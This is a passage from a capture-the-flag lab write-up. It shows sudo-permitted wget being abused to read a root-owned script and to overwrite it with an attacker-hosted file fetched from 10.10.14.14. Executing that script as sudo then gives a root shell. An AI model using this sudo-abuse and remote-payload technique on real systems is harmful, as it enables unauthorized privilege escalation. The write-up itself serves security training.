sammy@sunday:\~\$ sudo wget -i /root/troll
/root/troll: Invalid URL #!/usr/bin/bash: Unsupported scheme
/root/troll: Invalid URL /usr/bin/echo \"testing\": Unsupported scheme
/root/troll: Invalid URL /usr/bin/id: Unsupported scheme
No URLs found in /root/troll.
sammy@sunday:\~\$
Ok, so It's just a regular bash script. How can I write to this file? First I create a file on my Kali host named troll.
root@kali# cat troll
#!/usr/bin/bash
bash
Then I serve it via Python's simple web server, and download it to the target host.
sammy@Sunday:\~\$ sudo wget 10.10.14.14/troll -O /root/troll
\--01:07:16\-- <http://10.10.14.14/troll>
=\> \`/root/troll\'
Connecting to 10.10.14.14:80\... connected.
HTTP request sent, awaiting response\... 200 OK
Length: 23 \[application/octet-stream\]
100%\[=====================================================================================================================\>\] 23 \--.\--K/s
01:07:16 (4.04 MB/s) - \`/root/troll\' saved \[23/23\]
Then I drop back down to a shell as sunny, and execute the shell script as sudo.
sunny@sunday:\~\$ sudo /root/troll
root@sunday:\~#
root/SYSTEM Compromise
